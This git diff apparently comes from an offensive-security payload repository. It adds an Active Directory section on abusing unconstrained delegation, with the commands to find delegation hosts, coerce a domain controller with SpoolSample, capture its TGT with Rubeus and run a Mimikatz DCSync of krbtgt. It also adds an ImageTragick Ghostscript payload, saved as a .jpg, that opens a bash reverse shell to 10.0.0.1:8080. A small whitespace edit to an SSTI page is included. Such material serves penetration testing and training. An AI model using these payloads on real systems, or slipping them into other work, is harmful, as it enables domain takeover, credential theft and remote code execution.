diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 57de89f..8547242 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -11,7 +11,6 @@ * [Password in AD User comment](#password-in-ad-user-comment) * [Golden Tickets](#passtheticket-golden-tickets) * [Silver Tickets](#passtheticket-silver-tickets) - * [Trust Tickets](#trust-tickets) * [Kerberoast](#kerberoast) * [KRB_AS_REP roasting](#krb_as_rep-roasting) * [Pass-the-Hash](#pass-the-hash) @@ -20,6 +19,8 @@ * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Trust relationship between domains](#trust-relationship-between-domains) + * [Unconstrained delegation](#unconstrained-delegation) + * [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) * [PrivExchange attack](#privexchange-attack) * [Password spraying](#password-spraying) @@ -443,10 +444,6 @@ export KRB5CCNAME=/home/user/ticket.ccache ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ``` -### Trust Tickets - -TODO - ### Kerberoast > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names) @@ -608,6 +605,60 @@ SourceName TargetName TrustType TrustDirection domainA.local domainB.local TreeRoot Bidirectional ``` +### Unconstrained delegation + +#### Find delegation + +Check the `TrustedForDelegation` property. + +```powershell +# From https://github.com/samratashok/ADModule +PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} + +or + +$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 +grep TRUSTED_FOR_DELEGATION domain_computers.grep +``` + +NOTE: Domain controllers usually have unconstrained delegation enabled + +#### Monitor with Rubeus + +Monitor incoming connections from Rubeus. + +```powershell +Rubeus.exe monitor /interval:1 +``` + +#### Force a connect back from the DC + +> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface + +```powershell +# From https://github.com/leechristensen/SpoolSample +.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME +.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB +# DC01.HACKER.LAB is the domain controller we want to compromise +# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. +``` + +If the attack worked you should get a TGT of the domain controller. + +#### Load the ticket + +Extract the base64 TGT from Rubeus output and load it to our current session. + +```powershell +.\Rubeus.exe asktgs /ticket: /ptt +``` + +Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt` + +### Resource-Based Constrained Delegation + +TODO + ### PrivExchange attack Exchange your privileges for Domain Admin privs by abusing Exchange. @@ -711,4 +762,6 @@ Most of the time the best passwords to spray are : * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) * [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) -* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) \ No newline at end of file +* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) +* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) +* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) \ No newline at end of file diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index ec415dd..8de55ae 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -188,9 +188,9 @@ ${x} ## Jinja2 [Official website](http://jinja.pocoo.org/) -> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. +> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -### Basic injection +### Basic injection ```python {{4*4}}[[5*5]] diff --git a/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg b/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg new file mode 100644 index 0000000..c9fa358 --- /dev/null +++ b/Upload Insecure Files/CVE Image Tragik/imagetragik2_ubuntu_shell2.jpg @@ -0,0 +1,6 @@ +%!PS +userdict /setpagedevice undef +legal +{ null restore } stopped { pop } if +legal +mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1') currentdevice putdeviceprops \ No newline at end of file